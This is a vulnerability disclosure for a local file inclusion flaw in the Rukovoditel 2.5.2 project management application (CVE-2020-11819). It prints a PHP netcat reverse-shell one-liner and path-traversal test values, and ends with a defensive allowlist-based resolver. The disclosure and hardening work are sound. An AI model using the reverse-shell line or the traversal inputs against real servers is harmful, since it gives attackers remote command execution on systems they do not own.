Vendor: https://sourceforge.net/projects/rukovoditel/
Version: 2.5.2
Vulnerability: LFI
CVE: CVE-2020-11819
CVSS 3.x Base Score: 9.8 CRITICAL
Rukovoditel is a free web-based open-source project management application. A far cry from traditional applications, Rukovoditel gives users a broader and extensive approach to project management. Its customization options allow users to create additional entities, modify and specify the relationship between them, and generate the necessary reports. The platform enables users to craft their own application that is specifically tailored for their activity (CRM, ERP, HRM, WMS, etc.).
I was trying to change the language of the application while looking at Burp. I selected Russian as the language, then I realized that the russian.php file name is in the body of the request.
Here is my theory: the application runs the russian.php file in the directory, and if I put the exact path of a PHP reverse shell into the body of the request, I should gain access to the machine. Let’s try this theory. I write this one-liner PHP code:
<?php system("nc 127.0.0.1 1234 -e /bin/bash"); ?>
Then, I put this code into a test.php file in the root directory of the machine. Finally, I give the exact path of the test.php file and boom! The test.php file is executed and I gain access.
I know this may not be a real attack scenario, but I wanted to show that an attacker can run an arbitrary PHP file on the server, and this may lead to unexpected results.
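For the defensive side, the following added example (not Rukovoditel's own code and not from the original post) contrasts the include pattern described above with an allowlist-based resolver. The function name, the `language_file` parameter and the directory layout are assumptions made for illustration.

```php
<?php
// Added illustration; not Rukovoditel source. All names are hypothetical.

// Vulnerable pattern (the behaviour the post describes): the file name from
// the request body goes straight to include, so any readable .php path runs.
//   require $languagesDir . '/' . $_POST['language_file'];

/**
 * Hardened form: resolve a requested language file against an allowlist
 * built from the languages directory itself. Returns a path or null.
 */
function resolve_language_file(string $requested, string $languagesDir): ?string
{
    $base = realpath($languagesDir);
    if ($base === false) {
        return null;
    }
    // Allowlist: only *.php files that live directly inside $base.
    $allowed = [];
    foreach (glob($base . DIRECTORY_SEPARATOR . '*.php') ?: [] as $path) {
        $allowed[basename($path)] = $path;
    }
    // Exact match on the bare file name. Values containing separators,
    // "..", or an absolute path can never be a key of $allowed.
    if (!isset($allowed[$requested])) {
        return null;
    }
    // Defence in depth: a symlink in the directory must not point outside it.
    $real = realpath($allowed[$requested]);
    if ($real === false || dirname($real) !== $base) {
        return null;
    }
    return $real;
}

// Constructed demo: a temporary languages directory with two files.
$dir = sys_get_temp_dir() . '/lang_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/english.php", "<?php return ['hello' => 'Hello'];");
file_put_contents("$dir/russian.php", "<?php return ['hello' => 'Privet'];");

// Constructed inputs: one legitimate name and three path-style values.
foreach (['russian.php', '../test.php', '/test.php', 'russian.php/../../test.php'] as $input) {
    $file = resolve_language_file($input, $dir);
    printf("%-28s => %s\n", $input, $file === null ? 'rejected' : 'include ' . basename($file));
}
```

Only `russian.php` resolves to a file; every path-style value is rejected before any include is attempted, which is also a useful condition to log and alert on.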